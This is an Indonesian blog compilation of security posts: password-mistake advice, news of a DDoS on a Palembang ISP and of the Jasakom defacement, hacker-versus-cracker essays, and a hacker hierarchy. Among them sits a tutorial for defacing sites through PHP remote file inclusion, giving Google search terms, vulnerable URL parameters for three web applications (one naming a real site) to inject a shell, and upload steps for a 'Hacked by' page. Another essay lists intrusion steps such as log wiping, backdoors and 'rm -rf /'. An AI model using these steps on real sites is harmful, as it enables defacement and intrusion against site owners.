Kita banyak mendengar kriminalitas di dunia komputer, banyak situs di deface/hack, kartu kredit disalah gunakan oleh orang lain. Tapi yang menjadi pertanyaan, apakah ini kesalahan sistem semata ?? Berikut penulis mengungkapkan 5 kesalahan utama dalam hal security berdasarkan pengetahuan yang didapat dan pengalaman.
Banyak negara sudah mulai 'aware' / menaruh perhatian pada keamanan komputer (computer security) atau Internet security dengan adanya hukum cyber atau hukum mengenai kejahatan komputer salah satu contohnya adalah di Vietnam mulai bulan Mei. Dengan adanya hukum yang mengatur keamanan di bidang komputer ini bukan berarti dapat menghilangkan pelanggaran atau kejahatan dalam bidang ini tetapi setidaknya ada langkah yang akan diambil seandainya terjadi pelanggaran. Tapi sebenarnya masalah utama yaitu terletak pada pengguna/user yang menggunakan komputer.
Tampak bahwa perhatian pada bidang keamanan/security belakangan ini cukup meningkat dengan adanya pemberitaan di berbagai majalah ibukota terutama setelah terjadinya berbagai kasus penyalahgunaan di dunia cyber seperti contoh kasus situs BCA yang di-duplikat dengan nama yang mirip beberapa waktu lalu. Terlihat juga antusias dari pengunjung situs Techmedia pada artikel yang dibuat rekan kami 'cyworm' yaitu mengcrack Windows 2000 yang mencapai hit sekitar 500 lebih.
Oleh sebab itu penulis akan mencoba menulis beberapa artikel mengenai bidang keamanan jaringan komputer ini, tetapi sebelumnya penulis akan menyoroti 5 kesalahan utama yang dilakukan orang sehingga mengakibatkan data mereka dapat dicuri orang lain, situs dapat di hack/deface dsbnya.
Orang umumnya sebelum meninggalkan rumah akan mengunci pintu terlebih dahulu, tetapi dalam penggunaan komputer, orang lebih cenderung lebih ceroboh. Hal ini tidak hanya mencakup end-user atau pengguna tetapi termasuk semua orang di departemen IT. Berikut ini adalah 5 kesalahan utama dalam security.
Menuliskan Password di Kertas. Ini benar-benar terjadi. Selama penulis masih menjadi system administrator, beberapa kali penulis menemukan usernya menuliskan password mereka di secarik kertas atau kertas post-it kemudian menempelkannya di PC atau samping monitor. Terlalu malas untuk mengingat password mereka, sehingga dicatat di kertas dan meletakkannya begitu saja sehingga semua orang bisa membacanya. Berdasarkan survei yang pernah dilakukan oleh lembaga security di US menemukan bahwa sekitar 15 - 20 % user di suatu perusahaan melakukan hal ini. Andaikan user di perusahaan A mencapai 100 orang maka ada sekitar 15 sampai 20 orang yang melakukan keteledoran ini. Suatu jumlah yang besar yang dapat mengakibatkan kebocoran data perusahaan.
Pemilihan password yang jelek. Ada kecenderungan orang dalam memilih password mereka adalah dengan menggunakan nama orang dekat mereka seperti nama suami atau istri, nama pacar, nama orang-tua, nama binatang kesayangan atau tulisan di sekitar mereka yang gampang ditebak oleh orang lain. Atau bahkan menggunakan tanggal lahir mereka sendiri. Rekan saya cyworm dalam artikelnya telah menunjukkan bahwa penggunaan password yang jelek akan dengan gampang di-"crack" apalagi kalau password yang digunakan sama dengan user-name maka kurang dari semenit password tersebut akan dapat di-crack. Jika anda menggunakan password dengan kombinasi abjad, nomor dan huruf besar-kecil, maka dibutuhkan waktu yang cukup lama untuk meng-crack dan juga tergantung seberapa panjang password yang digunakan juga. Saat ini beberapa situs tertentu menggunakan kalimat (phrase) sebagai password seperti di situs hushmail.
Meninggalkan komputer yang sedang digunakan begitu saja. Ada banyak orang yang meninggalkan komputer mereka tanpa proteksi apa apa. Buat apa password ??? orang lain tinggal datang dan duduk untuk mengakses data anda. Berbagai sistem operasi sudah memberikan fasilitas seperti screen saver yang bisa diaktifkan passwordnya setelah misalnya 5 menit atau berapa sesuai dengan yang diset atau bisa di-lock begitu kita mau meninggalkan komputer kita.
Membuka lampiran (attachment) email tanpa melakukan pengecekan terlebih dahulu. Seiring dengan maraknya penggunaan email, virus banyak menyebar melalui email. Salah satu kesalahan utama yang banyak dilakukan oleh orang adalah membuka attachment email tanpa melakukan konfirmasi atau pengecekan terlebih dahulu terutama kalau mendapat kiriman dari orang yang tidak dikenal. Efek yang ditimbulkan selanjutnya jika attachmen itu berupa virus maka akan berakibat pada kehilangan data. Penulis sering kali menerima email dari orang tidak dikenal yang setelah dideteksi oleh program anti virus ternyata memang berisi virus terutama virus worm seperti Magistr.
Tidak adanya kebijakan security komputer di perusahaan. Bukan hal yang aneh jika perusahaan di Indonesia tidak memiliki hal ini karena perusahaan di Indonesia masih tidak 'aware' dengan security kecuali perusahaan multinasional, itupun karena keharusan dari headquarter yang mengharuskan menerapkan 'policy' di perusahaan mereka di Indonesia. Security policy ini yang mengatur segala hal yang berkaitan dengan keamanan komputer seperti penerapan password setiap orang (mis : 6 karakter panjangnya dan kombinasi numerik dan karakter), juga berisi sanksi yang akan diterima jika terjadi pelanggaran.
Masih terdapat beberapa penyebab kebocoran data komputer yang disebabkan oleh kelalaian dari si pengguna seperti laptop yang ditinggalkan di mobil sehingga bisa dicuri orang lain dan memberitahukan passwordnya ke orang lain. Jadi secanggih apapun teknologi yang diimplementasikan misalnya BCA meng-klaim mereka telah menggunakan enkrips SSL 128 bit, kemudian firewall dan berbagai proteksi lainnya (lihat artikel mengenai BCA di Techmedia). Tapi kesalahan mengetik dari para customer BCA bisa membawa kebocoran dana ataupun data.
Penulis sangat setuju dengan apa yang dikatakan oleh Bruce Schneier dalam bukunya 'Secret and Lies' bahwa security itu bukanlan produk atau teknologi, baik teknologi dan produk itu hanya sebagian kecil dari security itu sendiri. Security merupakan suatu Proses. Jadi proses dari perencanaan kebijakan security, review produk dan teknologi sampai dengan implementasi kemudian auditing.
Security : 5 Kesalahan Utama Dalam Security
by Tugas Etika Profesi | 10.42 in keamanan | komentar (2)
Kerugian Capai Rp 100 Juta
PALEMBANG – Tindak kejahatan di dunia maya atau yang lebih dikenal dengan cyber crime terjadi di metropolis. Seperti yang dilaporkan Yudha Pratomo ST (27), general manager PT Elektrindo Data Nusantara/Elnus (perusahaan teknologi informasi– internet service provider), Rabu (20/9) ke Siaga Ops Polda Sumsel.
Warga Jl Srijaya Negara, Kompleks Unsri No 25, RT 29, Kelurahan Bukit Lama, Kecamatan IB I, menyebutkan, kasus cyber crime yang dialami jaringan internet miliknya di Jl Jenderal Sudirman, Graha Bunda Lt 5, terjadi Jumat (15/9) sekitar pukul 20.30 WIB.
“Seseorang dengan nama samaran Mahadewa melakukan penyusupan atau dikenal istilah hacking ke fasilitas server/router dan melumpuhkan serta merusak jaringan internet milik kami, dan telah terjadi berulang-ulang sampai kami melapor,” ujar Yudha kepada Kepala Siaga Ops Polda Sumsel shief C Kompol Toheriyanto
Yudha menambahkan, pelaku (disebut hacker) melakukan serangan flood (DDOS attack) dengan memanfaatkan server asing ke router milik tempatnya bekerja, yang menyebabkan jaringan terputus dan tidak dapat melakukan aktivitas secara normal hingga mengalami kerugian sebesar Rp 100 juta. “Informasi ini kami dapatkan melalui log kejadian dari Firewall Elnus dan Indosat,” ulasnya.
Sesaat setelah serangan flood tersebut, Yudha menuturkan pihaknya mendapat informasi dari Firewall yang mengidentifikasi bahwa sumber serangan tersebut berasal dari IP Address 199.238.132.226 yang ditujukan ke roter Gateway milik PT Elnus. IP Addres tersebut terindikasi sebagai milik VERIO.COM yaitu sebuah server hosting yang berada di Amerika Serikat.
Dengan melakukan resolving menggunakan DNSSTUF.COM didapatkan bahwa hostname “nenen-di.biz” me-reserve ke IP Address tersebut. “Dari pantauan aktivitas yang bersangkuat di IRC, pelaku meletakkan BOT PSY di server tersebut dengan nama samaran Mahadewa,” tukas Yudha, yang laporan pengaduannya diterima dengan bukti laporan nomor polisi LP/566-B/IX/2006-Siaga Ops Polda Sumsel.
Terpisah, Kapolda Sumsel melalui Kabid Humas Polda Kombes Pol Abusopah Ibrahim SH didampingi Direktur Reskrim Polda Kombes Pol PS Pakpahan SH mengatakan akan menyelidiki kasus yang dialami Elnus ini. “Kita akan coba menangani kasus ini. Jajaran kita akan mengumpulkan informasi lebih banyak yang bisa membantu penyelidikan,” tegas Abusopah. (01/46)
sumeks.co.id
Cara Mudah Deface Remote File Include
Sebelum kita mulai lebih baik juga kita mengetahwi berbagai macam Command command yang bermanfaat bagi kita..
cd namadirectory = Melihat Suatu directory
ls -al = Melihat Suatu Directory Lebih Dalam lagi
find = Mengecek Directory directory
cat = Membaca Suatu Berkas
wget = MengUpload suatu Files
tar -zxvf = MengExtraxt suatu files yang berbentuk tgz
pwd = Mengetahui Di Directory mana Kita Berada
uname -a = Keberadaan Path berada
w = Mengetahui Siapa Saja yang telah menggunakan Shell.
curl = mendownload url
[EvilShellInject] = inject rshell / c99 kamu
Baiklah kita mulai dengan PHP karena PHP banyak sekali BUG nya..di antaranya :
Googling ajah, sebelumnya cari dulu RFI di http://www.milw0rm.com
- Site Oneadmin RFI
Kamu Search di Google masukkan Kata Kunci oneadmin site:.com / oneadmin site:com
nah sekarang saya kasi contoh pathnya … http://target.com/oneadmin/config.php?path[docroot]=
Contoh :
http://target.com/oneadmin/config.php?path[docroot]=[EvilShellInject]
- PnPhpBB2
Kamu Search di Google masukkan Kata Kunci modules.php powered by pnphpbb2 site:.com / modules.php powered by pnphpbb2 site:.net atau apa saja yang kalian suka atau kehendaki…
nah sekarang saya kasi contoh pathnya … http://target.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[EvilShellInject]
Contoh :
http://www.sikhe.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[EvilShellInject]
- Support Ticket
Kamu Search di Google masukkan Kata Kunci include/main.php site:.com / include/main.php site:.net atau apa saja yang kalian suka atau kehendaki…
nah sekarang saya kasi contoh pathnya … http://target.com/include/main.php?config[search_disp]=true&include_dir=
Contoh : … http://target.com/include/main.php?config[search_disp]=true&include_dir=[EvilShellInject]
Hehehe Lumayan banyak kan ? Nah selamat mencobanya..
Neh aku kasi beberapa web yang telah berhasil saya Deface..
Nah setelah itu buadlah sebuad file: index.html
Isi dengan:
Hacked by Nama Kamu
Kemudian upload deh file ke directorynya
kemudian buka website yang telah di deface:
http://target.com/lokasipathnya/index.html
Enjoy
Belajar cara jadi Hacker? Read this article first !!!
by Tugas Etika Profesi | 10.05 in hacker dan cracker | komentar (1)
Anda seorang hacker ? Atau anda bukan seorang hacker tetapi pingin menjadi hacker / cracker
dengan belajar cara menjadi seorang hacker yang bercita-cita menghacking website-website ternama / terkenal, atau ingin belajar membobol account bank. mencuri identitas kartu kredit / credit card, memporakporandakan blog / website milik yahoo,google,microsoft,symantec,dll ? Tampaknya tidak perlu sampai berpikir terlalu muluk-muluk untuk menjadi pemenang, anda cukup bisa menghacking search engine, dan banyak teknik-teknik / ilmu hitam utk menghack search engine…
Sangat mudah sekali, dan banyak sekali website-website personal yang mengajarkan teknik itu,
selain bebas dari masalah kriminal (karena hack search engine tidak sama dengan hacking tradisional), belajar menghacking google,yahoo,msn,dll juga sangat mengasyikkan, anda cukup mempelajari program seperti php atau perl ataupun asp, tidak perlu sampai belajar assembly atau c ataupun bahasa programming c++.
Salah satu teknik yang paling berbahaya adalah cloaking page, dimana anda bisa membuat search engine menjadi takluk kepada anda.
Jika teknik cloaking pages ini anda terapkan dan anda kombinasikan dengan sedikit potongan bahasa HTML alias kolaborasi sensasional yang mantap,
dengan memberikan sedikit META TAG noarchive, wow.. saya tidak bisa membayangkan bagaimana google akan bertekuklutut terhadap anda.
Saya sendiri pernah menerapkannya saat parked domain, dan memang sangat berbahaya sekali, revenue saya dari parked domain bisa mencapai 10 euro tiap domain,
coba bayangkan kalau anda mempunyai 50 domain ? Amazing..
Tetapi sekali lagi, saya tidak sarankan anda menjadi seorang penjahat, tetapi mungkin ini sedikit gambaran bagaimana menghack system jaringan tidak sama dengan hacking search engine.
Baca juga:
“AT&T ingin saya keluar dari jaringan mereka karena mereka sebenarnya tidak dapat mengamankan account saya,
dan setelah saya menjadi pelanggan yang loyal untuk beberapa decade, malah mendapat perlakuan seperti ini. Tampaknya lebih efektif dengan membuang saya ketimbang mengamankan informasi pelanggan mereka. Saya ingin me-review kontrak saya untuk melihat batasan apa saja yang ada di agreement layanan AT&T. Saya mungkin bisa mengajukan tuntutan untuk adanya invasi privacy atas kerusakan account saya dan untuk memproteksi informasi rahasia milik saya.” ungkap Mitnick.
Ironisnya, Mitnick berspekulasi bahwa siapapun yang bertanggungjawab telah menyusup ke account-nya past menggunakan teknik social engineering miliknya, yang pernah dibukukan dalam The Art of Deception miliknya. “Oknum tersebut mungkin membaca buku saya dan memutuskan untuk mencuri informasi saya menggunakan teknik social engineering saya karena caranya sangat mudah. Saya sudah bilang ke AT&T, namun mereka mengabaikannya. Kemungkinan lainnya dapat berimbas kepada pelanggan AT&T lainnya” jawab Mitnick.
Mitnick melancarkan komplainnya sejak Juni lalu, dan menemukan seseorang telah memposting nomor ponsel, alamat rumah, PIN, alamat email, IM, dan 4 digit terakhir dari nomor Social Security di web AT&T di bulan Maret. Ketika ia gagal mendapatkan respon dari AT&T atas komplainnya, kemudian ia memanggil pengacara untuk membayar sejumlah kerusakan atas reputasi dan hak ciptanya. Namun, menurut juru bicara AT&T, pihaknya telah menginvestigasi klaim Mitnick, dan memutuskan untuk menolak permintaan ganti rugi uang untuk Mitnick, namun membiarkan ia keluar dari kontrak, dan memilih carrier lain yang lebih nyaman baginya.
v (^o^) v
Read More..
Saya berharap ilmu keamanan jaringan di tulisan ini digunakan untuk hal-hal yang baik – jadilah Hacker bukan Cracker. Jangan sampai anda terkena karma karena menggunakan ilmu untuk merusak milik orang lain. Apalagi, pada saat ini kebutuhan akan hacker semakin bertambah di Indonesia dengan semakin banyak dotcommers yang ingin IPO di berbagai bursa saham. Nama baik & nilai sebuah dotcom bisa jatuh bahkan menjadi tidak berharga jika dotcom di bobol. Dalam kondisi ini, para hacker di harapkan bisa menjadi konsultan keamanan bagi para dotcommers tersebut – karena SDM pihak kepolisian & aparat keamanan Indonesia amat sangat lemah & menyedihkan di bidang Teknologi Informasi & Internet. Apa boleh buat cybersquad, cyberpatrol swasta barangkali perlu di budayakan untuk survival dotcommers Indonesia di Internet.
Berbagai teknik keamanan jaringan Internet dapat di peroleh secara mudah di Internet antara lain di http://www.sans.org, http://www.rootshell.com, http://www.linuxfirewall.org/, http://www.linuxdoc.org, http://www.cerias.purdue.edu/coast/firewalls/, http://www.redhat.com/mirrors/LDP/HOWTO/. Sebagian dari teknik ini berupa buku-buku yang jumlah-nya beberapa ratus halaman yang dapat di ambil secara cuma-cuma (gratis). Beberapa Frequently Asked Questions (FAQ) tentang keamanan jaringan bisa diperoleh di http://www.iss.net/vd/mail.html, http://www.v-one.com/documents/fw-faq.htm . Dan bagi para experimenter beberapa script / program yang sudah jadi dapat diperoleh antara lain di http://bastille-linux.sourceforge.net/ , http://www.redhat.com/support/docs/tips/firewall/firewallservice.html.
Bagi pembaca yang ingin memperoleh ilmu tentang jaringan dapat di download secara cuma-cuma dari http://pandu.dhs.org, http://www.bogor.net/idkf/, http://louis.idaman.com/idkf. Beberapa buku berbentuk softcopy yang dapat di ambil gratis dapat di ambil dari http://pandu.dhs.org/Buku-Online/ . Kita harus berterima kasih terutama kepada team Pandu yang dimotori oleh I Made Wiryana untuk ini. Pada saat ini, saya tidak terlalu tahu adanya tempat diskusi Indonesia yang aktif membahas teknik-teknik hacking ini – tetapi mungkin bisa sebagian di diskusikan di mailing list lanjut seperti kursus-linux@yahoogroups.com & linux-admin@linux.or.id yang di operasikan oleh Kelompok Pengguna Linux Indonesia (KPLI) http://www.kpli.or.id.
Cara paling sederhana untuk melihat kelemahan sistem adalah dengan cara mencari informasi dari berbagai vendor misalnya di http://www.sans.org/newlook/publications/roadmap.htm#3b tentang kelemahan dari sistem yang mereka buat sendiri. Di samping, memonitoring berbagai mailing list di Internet yang berkaitan dengan keamanan jaringan seperti dalam daftar http://www.sans.org/newlook/publications/roadmap.htm#3e.
Dijelaskan oleh Front-line Information Security Team, “Techniques Adopted By ‘System Crackers’ When Attempting To Break Into Corporate or Sensitive Private Networks,” fist@ns2.co.uk http://www.ns2.co.uk. Seorang Cracker umumnya pria usia 16-25 tahun. Berdasarkan statistik pengguna Internet di Indonesia maka sebetulnya mayoritas pengguna Internet di Indonesia adalah anak-anak muda pada usia ini juga. Memang usia ini adalah usia yang sangat ideal dalam menimba ilmu baru termasuk ilmu Internet, sangat disayangkan jika kita tidak berhasil menginternetkan ke 25000 sekolah Indonesia s/d tahun 2002 – karena tumpuan hari depan bangsa Indonesia berada di tangan anak-anak muda kita ini.
Nah, para cracker muda ini umumnya melakukan cracking untuk meningkatkan kemampuan / menggunakan sumber daya di jaringan untuk kepentingan sendiri. Umumnya para cracker adalah opportunis. Melihat kelemahan sistem dengan mejalankan program scanner. Setelah memperoleh akses root, cracker akan menginstall pintu belakang (backdoor) dan menutup semua kelemahan umum yang ada.
Seperti kita tahu, umumnya berbagai perusahaan / dotcommers akan menggunakan Internet untuk (1) hosting web server mereka, (2) komunikasi e-mail dan (3) memberikan akses web / internet kepada karyawan-nya. Pemisahan jaringan Internet dan IntraNet umumnya dilakukan dengan menggunakan teknik / software Firewall dan Proxy server. Melihat kondisi penggunaan di atas, kelemahan sistem umumnya dapat di tembus misalnya dengan menembus mailserver external / luar yang digunakan untuk memudahkan akses ke mail keluar dari perusahaan. Selain itu, dengan menggunakan agressive-SNMP scanner & program yang memaksa SNMP community string dapat mengubah sebuah router menjadi bridge (jembatan) yang kemudian dapat digunakan untuk batu loncatan untuk masuk ke dalam jaringan internal perusahaan (IntraNet).
Agar cracker terlindungi pada saat melakukan serangan, teknik cloacking (penyamaran) dilakukan dengan cara melompat dari mesin yang sebelumnya telah di compromised (ditaklukan) melalui program telnet atau rsh. Pada mesin perantara yang menggunakan Windows serangan dapat dilakukan dengan melompat dari program Wingate. Selain itu, melompat dapat dilakukan melalui perangkat proxy yang konfigurasinya kurang baik.
Setelah berhasil melompat dan memasuki sistem lain, cracker biasanya melakukan probing terhadap jaringan dan mengumpulkan informasi yang dibutuhkan. Hal ini dilakukan dengan beberapa cara, misalnya (1) menggunakan nslookup untuk menjalankan perintah ‘ls ‘ , (2) melihat file HTML di webserver anda untuk mengidentifikasi mesin lainnya, (3) melihat berbagai dokumen di FTP server, (4) menghubungkan diri ke mail server dan menggunakan perintah ‘expn ‘, dan (5) mem-finger user di mesin-mesin eksternal lainnya.
Langkah selanjutnya, cracker akan mengidentifikasi komponen jaringan yang dipercaya oleh system apa saja. Komponen jaringan tersebut biasanya mesin administrator dan server yang biasanya di anggap paling aman di jaringan. Start dengan check akses & eksport NFS ke berbagai direktori yang kritis seperti /usr/bin, /etc dan /home. Eksploitasi mesin melalui kelemahan Common Gateway Interface (CGI), dengan akses ke file /etc/hosts.allow.
Selanjutnya cracker harus mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan. Cracker bisa mengunakan program di Linux seperti ADMhack, mscan, nmap dan banyak scanner kecil lainnya. Program seperti ‘ps’ & ‘netstat’ di buat trojan (ingat cerita kuda troya? dalam cerita klasik yunani kuno) untuk menyembunyikan proses scanning. Bagi cracker yang cukup advanced dapat mengunakan aggressive-SNMP scanning untuk men-scan peralatan dengan SNMP.
Setelah cracker berhasil mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan, maka cracker akan menjalan program untuk menaklukan program daemon yang lemah di server. Program daemon adalah program di server yang biasanya berjalan di belakang layar (sebagai daemon / setan). Keberhasilan menaklukan program daemon ini akan memungkinkan seorang Cracker untuk memperoleh akses sebagai ‘root’ (administrator tertinggi di server).
Untuk menghilangkan jejak, seorang cracker biasanya melakukan operasi pembersihan ‘clean-up’ operation dengan cara membersihkan berbagai log file. Dan menambahkan program untuk masuk dari pintu belakang ‘backdooring’. Mengganti file .rhosts di /usr/bin untuk memudahkan akses ke mesin yang di taklukan melalui rsh & csh.
Selanjutnya seorang cracker dapat menggunakan mesin yang sudah ditaklukan untuk kepentingannya sendiri, misalnya mengambil informasi sensitif yang seharusnya tidak dibacanya; mengcracking mesin lain dengan melompat dari mesin yang di taklukan; memasang sniffer untuk melihat / mencatat berbagai trafik / komunikasi yang lewat; bahkan bisa mematikan sistem / jaringan dengan cara menjalankan perintah ‘rm -rf / &’. Yang terakhir akan sangat fatal akibatnya karena sistem akan hancur sama sekali, terutama jika semua software di letakan di harddisk. Proses re-install seluruh sistem harus di lakukan, akan memusingkan jika hal ini dilakukan di mesin-mesin yang menjalankan misi kritis.
Oleh karena itu semua mesin & router yang menjalankan misi kritis sebaiknya selalu di periksa keamanannya & di patch oleh software yang lebih baru. Backup menjadi penting sekali terutama pada mesin-mesin yang menjalankan misi kritis supaya terselamatkan dari ulah cracker yang men-disable sistem dengan ‘rm -rf / &’.
Bagi kita yang sehari-hari bergelut di Internet biasanya justru akan sangat menghargai keberadaan para hacker (bukan Cracker). Karena berkat para hacker-lah Internet ada dan dapat kita nikmati seperti sekarang ini, bahkan terus di perbaiki untuk menjadi sistem yang lebih baik lagi. Berbagai kelemahan sistem di perbaiki karena kepandaian rekan-rekan hacker yang sering kali mengerjakan perbaikan tsb. secara sukarela karena hobby-nya. Apalagi seringkali hasil hacking-nya di sebarkan secara cuma-cuma di Internet untuk keperluan masyarakat Internet. Sebuah nilai & budaya gotong royong yang mulia justru tumbuh di dunia maya Internet yang biasanya terkesan futuristik dan jauh dari rasa sosial.
Pengembangan para hobbiest hacker ini menjadi penting sekali untuk keberlangsungan / survival dotcommers di wahana Internet Indonesia. Sebagai salah satu bentuk nyatanya, dalam waktu dekat Insya Allah sekitar pertengahan April 2001 akan di adakan hacking competition di Internet untuk membobol sebuah server yang telah di tentukan terlebih dahulu. Hacking competition tersebut di motori oleh anak-anak muda di Kelompok Pengguna Linux Indonesia (KPLI) Semarang yang digerakan oleh anak muda seperti Kresno Aji (masaji@telkom.net), Agus Hartanto (hartx@writeme.com) & Lekso Budi Handoko ( handoko@riset.dinus.ac.id). Seperti umumnya anak-anak muda lainnya, mereka umumnya bermodal cekak – bantuan & sponsor tentunya akan sangat bermanfaat dan dinantikan oleh rekan-rekan muda ini.
Mudah-mudahan semua ini akan menambah semangat pembaca, khususnya pembaca muda, untuk bergerak di dunia hacker yang mengasyikan dan menantang. Kalau kata Captain Jean Luc Picard di Film Startrek Next Generation, “To boldly go where no one has gone before”.
Jumat kemarin, situs pemerintah Lithuania telah mendapatkan peringatan akan adanya serangan terhadap website dan segera melakukan pertahanan. Namun, banyak situs komersil tidak mengetahui peringatan tersebut, sehingga ratusan situs tersebut terkena deface.
Tapi, Senin kemarin, banyak diantara situs tersebut sudah kembali seperti semula.
Bukti awal menunjukkan ada sebuah kelompok hacker yang telah mengorganisasikan untuk melakukan serangan. Alamat IP yang digunakan untuk melakukan serangan berasal dari berbagai negara, tapi menurut Reston dari iDefense, dalam pernyataannya ke The Washington Post bahwa satu situs, hack-war.ru, sepertinya ikut dalam aksi sernagan tersebut.
Dancho Danchev, dari ZDNet menjelaskan bahwa aksi deface tersebut bisa saja meluas/meningkat menjadi aksi denial-of-service. Selain itu, Brian Krebs dari The Wahington Post berspekulasi bahwa Negara-negara pecahan akan mencoba untuk mempertahankan diri dari aksi cyber attack yang sama seperti apa dialami oleh ratusan web Lithuania dimasa mendatang.
Sama seperti serangan Denial-Of-Service (DOS) ke situs-situs Estonia, serangan yang baru terjadi ini merupakan reaksi dihilangkannya symbol Soviet di bendera Lithuania.
Penulis : Arief Lukman
FTI - Universitas Atmajaya
Read More..
Situs Jasakom di deface oleh Hacker Malaysia Oleh JS
by Tugas Etika Profesi | 10.00 in hacker dan cracker | komentar (0)
Situs Jasakom di deface oleh Hacker Malaysia
Rabu, 3 Oktober bisa dikatakan sebagai hari yang kelam bagi komunitas Jasakom. Situs jasakom beserta forum jasakom telah dihack dan database yang digunakan juga dihapus semua. Akibatnya, website tidak bisa diakses dan hanya menampilkan pesan :
HACKED BY TBD.MY
JASAKOM, IF YOU THINK YOU ARE SECURE ? YOURE NOT!!
youre nothing just piece of crap. We wont attack you, If you stay away from .my sites
Dengan dihapusnya semua data diserver, otomatis forum Jasakom yang menaungi lebih dari 40.000 anggota menjadi tidak bisa diakses sama sekali. Karena data yang telah terhapus semua, restore web dan forum terpaksa dilakukan melalui data yang telah terbackup sebelumnya dan akhirnya bisa diaktifkan dalam hari yang sama juga.
Sampai saat ini, masih belum diketahui secara pasti teknik yang digunakan untuk melakukan hacking kedalam situs dan forum jasakom karena akses terhadap log yang cukup terbatas. Berdasarkan analisa dari log yang ada, bisa diketahui beberapa hal. Diantaranya adalah hacker melakukan aksi hackingnya dengan user dan password web hosting. Berdasarkan user dan password dari hosting ini, hacker masuk ke spanel dan melakukan aksi perusakan dari situ. Berdasarkan log, terlihat pula ada percobaan pengambilan database. Karena akses ke dalam web hosting, hampir bisa dipastikan bahwa database forum maupun web telah berhasil didapatkan.
Berdasarkan database yang didapatkan ini, diperkirakan hacker akan mencoba mendapatkan password semua user web dan forum jasakom yang berjumlah hampir 100.000 orang walaupun tahapan ini tetap membutuhkan waktu dan keberuntungan. Untuk mendapatkan password, hacker harus menjalani proses cracking hash table karena semua password yang tersimpan didalam database telah dilakukan proses hash yang tidak bisa langsung dibaca. Password yang menggunakan kata-kata umum seperti 'admin', '123',dlsb biasanya akan mudah diketahui dalam waktu singkat namun apabila password yang digunakan sangat rumit seperti 'b4t*k$_.1nd0N4siA.!' (bisa dibaca 'batik indonesia'), hampir tidak mungkin mendapatkan password ini. Jadi semakin rumit dan banyak jumlah karakter yang digunakan, semakin sulit mendapatkan passwordnya, sekalipun hacker telah mengetahui nilai hash.
Selain menghapus database, Hacker Malaysia juga tampak melakukan serangan Ddos ke situs jasakom, forum jasakom dan situs jatimcrew melalui berbagai situs yang berhasil didapatkan. Serangan ddos tampaknya menggunakan teknik iframe yaitu membuat pengguna yang membuka halaman yang telah dihack secara otomatis membuka situs jasakom dalam jumlah yang banyak. Semakin banyak pengguna, akan semakin banyak akses ke situs jasakom dan hal ini akan membuat situs menjadi down apabila tidak memiliki bandwidth yang cukup.
Berdasarkan apa yang terjadi, kami memohon maaf kepada para pengguna situs dan forum jasakom atas gangguan yang terjadi. Kami juga menghimbau para pengguna web dan forum untuk segera mengganti password yang digunakan sebelum proses cracking berhasil dilakukan. Untuk menjaga-jaga, sebaiknya segera gunakan password yang aman agar pencurian database tidak akan membahayakan account Anda. Password yang aman disarankan agar menggunakan minimal 8 karakter, menggunakan kombinasi huruf kecil, besar dan spesial karakter.
1. Hacker
Hacker adalah sebutan untuk orang atau sekelompok orang yang memberikan sumbangan bermanfaat untuk dunia jaringan dan sistem operasi, membuat program bantuan untuk dunia jaringan dan komputer.Hacker juga bisa di kategorikan perkerjaan yang dilakukan untuk mencari kelemahan suatu system dan memberikan ide atau pendapat yang bisa memperbaiki kelemahan system yang di temukannya.
2. Cracker
Sedangkan cracker adalah sebutan untuk orang yang mencari kelemahan system dan memasukinya untuk kepentingan pribadi dan mencari keuntungan
dari system yang di masuki seperti: pencurian data, penghapusan, dan banyak yang lainnya.
Hirarki / Tingkatan Hacker
Ternyata Hacker juga mempunyai tingkatan-tingkatan, tiap tingkatan di bedakan dengan kemampuan dan ilmu yang dimiliki sang hacker :
1.Elite
Ciri-ciri : mengerti sistem operasi luar dalam, sanggup mengkonfigurasi & menyambungkan jaringan secara global, melakukan pemrogramman setiap harinya, effisien & trampil, menggunakan pengetahuannya dengan tepat, tidak menghancurkan data-data, dan selalu mengikuti peraturan yang ada. Tingkat Elite ini sering disebut sebagai ‘suhu’.
2.Semi Elite
Ciri-ciri : lebih muda dari golongan elite, mempunyai kemampuan & pengetahuan luas tentang komputer, mengerti tentang sistem operasi (termasuk lubangnya), kemampuan programnya cukup untuk mengubah program eksploit.
3.Developed Kiddie
Ciri-ciri : umurnya masih muda (ABG) & masih sekolah, mereka membaca tentang metoda hacking & caranya di berbagai kesempatan, mencoba berbagai sistem sampai akhirnya berhasil & memproklamirkan kemenangan ke lainnya, umumnya masih menggunakan Grafik User Interface (GUI) & baru belajar basic dari UNIX tanpa mampu menemukan lubang kelemahan baru di sistem operasi.
4.Script Kiddie
Ciri-ciri : seperti developed kiddie dan juga seperti Lamers, mereka hanya mempunyai pengetahuan teknis networking yang sangat minimal, tidak lepas dari GUI, hacking dilakukan menggunakan trojan untuk menakuti & menyusahkan hidup sebagian pengguna Internet.
5.Lammer
Ciri-ciri : tidak mempunyai pengalaman & pengetahuan tapi ingin menjadi hacker sehingga lamer sering disebut sebagai ‘wanna-be’ hacker, penggunaan komputer mereka terutama untuk main game, IRC, tukar menukar software prirate, mencuri kartu kredit, melakukan hacking dengan menggunakan software trojan, nuke & DoS, suka menyombongkan diri melalui IRC channel, dan sebagainya. Karena banyak kekurangannya untuk mencapai elite, dalam perkembangannya mereka hanya akan sampai level developed kiddie atau script kiddie saja.
Cracker tidak mempunyai hirarki khusus karena sifatnya hanya membongkar dan merusak
Hacker, Riwayatmu Kini…..” oleh: Donny B.U., M.Si
by Tugas Etika Profesi | 09.57 in hacker dan cracker | komentar (1)
=========
Pengantar
=========
Pernah suatu ketika pada tanggal 10 Agustus 2001 sebuah media massa online memberitakan mengenai hacker yang membobol dan men-deface (mengubah content maupun layout) beberapa situs di Internet dan memasang foto Tommy Soeharto di situs tersebut. Menurut media massa tersebut, aksi hacker tersebut adalah merupakan bantuan untuk menyebarluaskan dan menangkap Tommy Soeharto. Pada halaman yang di-deface tersebut, tertulis juga pesan “Hacked and deface not only a crime. This person is #1 criminal in our country”.
